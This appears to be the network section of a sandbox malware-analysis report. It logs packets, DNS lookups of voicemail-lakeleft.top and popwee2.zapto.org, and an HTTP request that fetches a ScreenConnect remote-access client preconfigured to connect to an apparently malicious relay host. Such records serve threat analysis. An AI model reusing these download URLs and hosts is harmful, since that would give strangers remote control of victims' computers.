                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540726900 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540754080 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540761948 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540771961 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540777922 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540791988 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540801048 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540837049 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540843010 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540882111 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540956974 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540972948 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541013002 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541021109 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541287899 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541309118 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541343927 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541352034 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541363955 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541393995 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541594982 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541620970 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541649103 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541655064 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541666985 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541695118 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541963100 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541979074 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542031050 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542037964 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542279005 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542298079 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542329073 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542335987 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542361021 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542385101 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542474031 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542488098 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542536020 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542541981 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542565107 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542587996 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628103018 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628122091 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628184080 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628197908 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628257036 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628478050 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628494024 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628551960 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628560066 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628580093 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628603935 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656308889 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656379938 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656621933 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656676054 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656743050 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656752110 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656784058 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656821012 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656830072 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656851053 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656939030 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656941891 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656992912 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657001972 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657162905 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657181978 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657215118 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657227039 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657236099 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657293081 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657314062 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657344103 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657351017 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657361031 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657371998 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657404900 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657413006 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.658229113 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.658276081 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.658334970 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:46.233032942 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:46.237824917 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:46.238476038 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:47.670515060 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:47.675381899 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:47.916107893 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:47.948199034 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:47.953064919 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:48.187362909 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:48.291598082 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:10:18.213934898 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:10:18.218858004 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:10:18.452091932 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:10:18.495121956 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:10:48.464467049 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:10:48.469583035 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:10:48.704150915 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:10:48.745438099 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:11:18.730514050 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:11:18.735749960 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:11:18.969363928 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:11:19.011524916 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:11:48.980528116 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:11:48.985820055 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:11:49.219935894 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:11:49.277376890 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:12:19.238533020 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:12:19.507050037 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:12:19.740705967 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:12:19.793293953 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:18.592256069 CET6276553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:18.953244925 CET53627651.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:19.942661047 CET6194153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:46.195241928 CET5536253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:46.203769922 CET53553621.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:18.592256069 CET192.168.2.71.1.1.10x2f43Standard query (0)voicemail-lakeleft.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:19.942661047 CET192.168.2.71.1.1.10x5699Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:46.195241928 CET192.168.2.71.1.1.10x5223Standard query (0)popwee2.zapto.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:18.953244925 CET1.1.1.1192.168.2.70x2f43No error (0)voicemail-lakeleft.top194.59.30.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:19.952583075 CET1.1.1.1192.168.2.70x5699No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:22.872977018 CET1.1.1.1192.168.2.70x83ceNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:22.872977018 CET1.1.1.1192.168.2.70x83ceNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:23.546679974 CET1.1.1.1192.168.2.70xc1b5No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:23.546679974 CET1.1.1.1192.168.2.70xc1b5No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:24.995965958 CET1.1.1.1192.168.2.70x45b7No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:24.995965958 CET1.1.1.1192.168.2.70x45b7No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:46.203769922 CET1.1.1.1192.168.2.70x5223No error (0)popwee2.zapto.org194.59.30.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:10:13.118474007 CET1.1.1.1192.168.2.70x7f5bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:10:13.118474007 CET1.1.1.1192.168.2.70x7f5bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  • voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.749706194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:19 UTC635OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-11-08 10:09:20 UTC251INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 117980
                                                                                                                                                                                                                                                                  Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:20 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:20 UTC16133INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                                                                                                                  2024-11-08 10:09:20 UTC16384INData Raw: 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c 4a 32 74 43 54 42 31 6d 59 6c 66 59 4e 57 4a
                                                                                                                                                                                                                                                                  Data Ascii: GliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJLJ2tCTB1mYlfYNWJ
                                                                                                                                                                                                                                                                  2024-11-08 10:09:20 UTC16384INData Raw: 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48 4d 41 62 77 42 75 41 47 45 41 62 41 42 55 41
                                                                                                                                                                                                                                                                  Data Ascii: UAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAHMAbwBuAGEAbABUA
                                                                                                                                                                                                                                                                  2024-11-08 10:09:20 UTC16384INData Raw: 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46 55 41 62 67 42 70 41 47 34 41 63 77 42 30 41
                                                                                                                                                                                                                                                                  Data Ascii: AAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAFUAbgBpAG4AcwB0A
                                                                                                                                                                                                                                                                  2024-11-08 10:09:20 UTC16384INData Raw: 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48 46 31 59 57 78 70 64 48 6b 67 61 57 59 67 62
                                                                                                                                                                                                                                                                  Data Ascii: Nob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIHF1YWxpdHkgaWYgb
                                                                                                                                                                                                                                                                  2024-11-08 10:09:20 UTC16384INData Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 42 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 43 2f 6f 32 35 66 41 41 41 41 41 4f 45 41 41 41 41 67 51 51 42 77 41 48 41 41 62 41 42 70 41 47 4d 41 59 51 42 30 41 47 6b 41 62 77 42 75 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 41 41 41 41 41 41 41 54 35 54 62 32 5a 30 64 32 46 79 5a 53 42 70 63 79 42 31 63 47 52 68 64 47 6c 75 5a 79 34 75 4c 69 42 51 62 47 56 68 63 32 55 67 5a 47 38 67 62 6d 39 30 49 48 52 31 63 6d 34 67 62 32 5a 6d 49 48 6c 76 64 58 49 67 59 32 39 74 63 48 56 30
                                                                                                                                                                                                                                                                  Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAABAAAAAAAAAFBBRFBBRFC/o25fAAAAAOEAAAAgQQBwAHAAbABpAGMAYQB0AGkAbwBuAFQAaQB0AGwAZQAAAAAAAT5Tb2Z0d2FyZSBpcyB1cGRhdGluZy4uLiBQbGVhc2UgZG8gbm90IHR1cm4gb2ZmIHlvdXIgY29tcHV0
